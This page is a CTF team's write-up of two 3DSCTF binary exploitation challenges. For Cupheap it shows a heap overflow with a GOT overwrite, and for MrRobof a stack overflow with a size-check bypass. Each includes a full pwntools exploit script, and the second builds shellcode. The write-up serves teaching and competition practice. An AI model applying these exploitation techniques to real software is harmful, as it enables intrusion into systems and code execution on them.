<!DOCTYPE html>
<html lang="en-US">
		<head>
				<meta charset="UTF-8">

				<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>3DSCTF - Cupheap, MrRobof | Ntropy - UNC</title>
<meta name="generator" content="Jekyll v3.9.2" />
<meta property="og:title" content="3DSCTF - Cupheap, MrRobof" />
<meta name="author" content="dreamist" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="In between flights I had gotten to doing two of the PWN challenges in 3DSCTF. Here I shall explain as best I can the notes I took during the event." />
<meta property="og:description" content="In between flights I had gotten to doing two of the PWN challenges in 3DSCTF. Here I shall explain as best I can the notes I took during the event." />
<link rel="canonical" href="http://localhost:4000/update/post/3dsctf/writeup/pwn/python/2018/01/14/Writeup-3DSCTF-Cupheap-MrRobof.html" />
<meta property="og:url" content="http://localhost:4000/update/post/3dsctf/writeup/pwn/python/2018/01/14/Writeup-3DSCTF-Cupheap-MrRobof.html" />
<meta property="og:site_name" content="Ntropy - UNC" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-01-14T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="3DSCTF - Cupheap, MrRobof" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"dreamist"},"dateModified":"2018-01-14T00:00:00-05:00","datePublished":"2018-01-14T00:00:00-05:00","description":"In between flights I had gotten to doing two of the PWN challenges in 3DSCTF. Here I shall explain as best I can the notes I took during the event.","headline":"3DSCTF - Cupheap, MrRobof","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/update/post/3dsctf/writeup/pwn/python/2018/01/14/Writeup-3DSCTF-Cupheap-MrRobof.html"},"url":"http://localhost:4000/update/post/3dsctf/writeup/pwn/python/2018/01/14/Writeup-3DSCTF-Cupheap-MrRobof.html"}</script>
<!-- End Jekyll SEO tag -->

				<meta name="description" content="The official website for ntropy, UNC Chapel Hill CTF Team"/>
				<meta name="viewport" content="width=device-width, initial-scale=1">
				<meta name="theme-color" content="#157878">
				<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' rel='stylesheet' type='text/css'>
				<link rel="stylesheet" href="/assets/css/style.css?v=">


				<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css"></link>
				<script src="https://code.jquery.com/jquery-1.10.2.js"></script>
		</head>
		<body>
				<div class="container-fluid">
						<div class="row">
								<div class="col"></div>
								<div class="col-8" id="main_col">

								<!-- Navigation -->
								<nav class="navbar navbar-expand-sm bg-dark navbar-dark">
										<a class="navbar-brand" href="https://ntropy-unc.github.io/">
												<img class="logo" alt= "logo" src="/img/logo.svg"></img>
										</a>
										<ul class="navbar-nav mr-auto">
												<li class="nav-item">
														<a class="nav-link" href="/about/">About</a>
												</li>

												<li class="nav-item">
														<a class="nav-link" href="/writeups/">Write Ups</a>
												</li>
												<li class="nav-item">
														<a class="nav-link" href="/events/">Events</a>
												</li>
												<li class="nav-item">
														<a class="nav-link" href="/resources/">Resources</a>
												</li>
										</ul>
								</nav>

				<section class="main-content">
						<p>In between flights I had gotten to doing two of the PWN challenges in 3DSCTF.
Here I shall explain as best I can the notes I took during the event.</p>

<h2 id="cupheap">Cupheap</h2>

<p>First things first, we’re exploiting a 64-bit x86 binary with NX enabled, partial RELRO,
and neither PIC nor stack canaries.</p>

<p>When you run the binary, you get the following opening prompt.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>       Well Cuphead and his pal Mugman
            They like to roll the dice
                   By chance they came
                        On Heap's game
          And gosh they paid the price
                      (Paid the price)

              And now they're fighting
                       For their lives
       On a mission fraught with dread
                   And if they proceed
                     But don't succeed
Well, the Devil will take their faults

After loose a bet against The Devil, now they need to collect 
 memory contracts to bargain for their souls.

Choose one option:

1 - Collect memory
2 - Defeat Dice right-hand of The Devil
3 - Give up
</code></pre></div></div>

<p>Cool stuff.</p>

<p>Each time you collect memory, you’re randomly incrementing a global variable <code class="language-plaintext highlighter-rouge">contracts</code>
in amounts of 0, 0x400, or 0x800 in rounds of five. You start with 0x100. 
On a few different specific amounts,
new options open up. Randomization seeded with <code class="language-plaintext highlighter-rouge">srand(time())</code>.</p>

<p>Also, when the main function first runs, there’s four calls to malloc, moving the heap
into something like this, where each cell is 8 bytes in length.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Malloc 1 (0x10)
.--------------------------.
|___0x1_____|___malloc2_ptr|
                   |          
Malloc 2 (0x8)     |
-------------      |
|__empty____|&lt;-----*

Malloc 3 (0x10)
.--------------------------.
|___0x1_____|___malloc4_ptr|
                   |          
Malloc 4 (0x8)     |
-------------      |
|__empty____|&lt;-----*

</code></pre></div></div>

<p>The pointers to the Malloc 1 and Malloc 3 region (both containing pointers to the
2nd and 4th) are stored on the stack. Under glibc’s malloc implementation, these
allocations are contiguous, one coming right after the other, which opens up the 
door for us when we can hit the <code class="language-plaintext highlighter-rouge">mausoleum</code> function. This function can only
be reached after reaching 0x1100 souls, achievable with checks in a loop.
I mentally decompiled this function from the disassembly into the following C-psuedocode.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void mausoleum(){
	extern (void*) malloc1[2];
        extern (void*) malloc3[2];
        char buffer[0x1000];
        printf("You are in the Mausoleum...\n");
        fgets(buffer, 0x1000, stdin);
        strcpy(malloc1[1], buffer);
        fgets(buffer, 0x1000, stdin);
        strcpy(malloc3[1], buffer);
}
</code></pre></div></div>

<p>The neat ordering of the allocations allow us to use strcpy to overflow through Malloc 2,
and into Malloc 3 such that we can overwrite the pointer to Malloc 4. Then
when strcpy gets called again, we can essentially get an arbitrary write into anywhere in the
process space.</p>

<p>The arbitrary write might have a number of good targets, but the most convenient is the
<a href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">Global Offset Table</a> entry for <code class="language-plaintext highlighter-rouge">exit</code>, since it’s called very soon after. After doing some
additional enumeration of abusable functions within the binary, I notice one that was
compiled in, but never called. <code class="language-plaintext highlighter-rouge">visitHell</code> turned out to read the flag from a file on the local
file system, removing the need for me to get a shell.</p>

<p>Here’s the essential exploit.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/python

from pwn import *

binary = "cupheap"
elf = ELF(binary)
chall, port = "cupheap01.3dsctf.org", 8007

context.log_level = "DEBUG"
DEBUG = False


def getpipe():
    if DEBUG:
        return process(binary)
    else:
        return remote(chall, port)

"""
In order to reach the vulnerable code in mauosoleum,
we have to get exactly 0x1100 in the variable contracts.
This variable is printed out in hex after every use of the
first menu option "Collect memory."

This has to be tried repeatedly until we get exactly 0x1100.
"""
p = None

def getContracts(proc):
    while True:
        proc.recvuntil("Give up\n")
        proc.send("1\n")
        proc.recvuntil("You have ")
        contracts = int(proc.recv(6), 16)
        if contracts == 0x1100:
            return True
        elif contracts &gt; 0x1100:
            return False

p = getpipe()

while getContracts(p) != True:
    p.close()
    p = getpipe()

"Drop into the second menu form immediately by giving some char not 1-3"
if "What's next?" not in p.recv():
    p.send("\n\n")

p.recv()

"""
At this point, we should be granted access to the Mausoleum.

Now we take advantage of adjacent heap allocations.
"""

p.send("4\n") #Enter the Mausoleum

""" Overwrite pointer to malloc4 with exit()'s GOT entry."""
payload1 = flat([0xAAAAAAAAAAAAAAAA]*5, elf.got['exit'], word_size=64)

p.sendline(payload1)
#What's visitHell()?
visitHell = elf.symbols[u'_Z9visitHellv']
payload2 = flat(visitHell, word_size=64)
p.sendline(payload2)

print p.recv()

#3DS{y0u_ALL_fr33_0F_th3_H34Ps_d3BT}
</code></pre></div></div>

<h1 id="mrrobof">MrRobof</h1>

<blockquote>
  <p>Sometimes, Elliot needs to do boring work.</p>
</blockquote>

<p>No NX, no stack canary, and no PIC despite using code that loads data position-independent.</p>

<p>The binary reads in arbitrarily-sized data into a size-0x28 (40 bytes) buffer on the stack.
The trick is that the input is put through two sets of input validation, 
in <code class="language-plaintext highlighter-rouge">validateSize</code> and <code class="language-plaintext highlighter-rouge">validateIP</code>.</p>

<p><code class="language-plaintext highlighter-rouge">validateIP</code> simply loops through the first 40 characters to only allow an ipv6 address.
<code class="language-plaintext highlighter-rouge">validateSize</code> takes the size of the input into a single byte, and compares that single BYTE
against 40.</p>

<p>In order to bypass, the first 40 characters need to be a valid ipv6 address, and
the recorded size count must be between 0 and 0x28 when stuck in a single byte.</p>

<p>So, without NX I first set out to get a shell by getting our EIP to point to the stack, but
after doing some enumeration, a compiled-yet-unused function was again the easiest way to get
the flag. Some of the code in the following exploit is then probably unnecessary,
since I didn’t need my own shellcode.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from pwn import *

binary = "mrrobof" #Renamed just because
chall, port = "mrrobof01.3dsctf.org", 8006
e = ELF(binary)

context.log_level = "DEBUG"
DEBUG = False

def getpipe():
    if DEBUG:
        return process(binary)
    else:
        return remote(chall, port)

input_len = 0x1ff00

"""Send an example ip str + someint*0x100 + randrange(0x2,0x28)"""
ip_ex = "2001:0db8:85a3:0000:0000:8a2e:0370:7334."

shellcode = asm(shellcraft.linux.sh())

"""Heh, might not be PIE after all. But there's something I missed again."""
readIPs = e.symbols['readIPs'] #Again?
control_eip = flat("A"*12, readIPs)

padding = "\x90"*(input_len - len(shellcode) - len(ip_ex) - len(control_eip))
code = padding + shellcode

payload = ip_ex
payload += control_eip
payload += code
payload += '\x90'*3 #Need counting byte of 0x2-0x28 to pass, last gets chopped

print "Length:", hex(len(payload))

open("payload","w").write(payload)

p = getpipe()
p.sendline(payload)
print p.recv()
time.sleep(0.3)

if DEBUG and p.poll() == None:
    print p.recv()
if not DEBUG:
    print p.recv()

</code></pre></div></div>

<p>Didn’t write down the flag to this one.</p>


						<footer id="site-footer">
								Contact : ntropy.unc@gmail.com
						</footer>
				</section>

						
								</div>
								<div class="col"></div>
						</div>
				</div>
		</body>
</html>
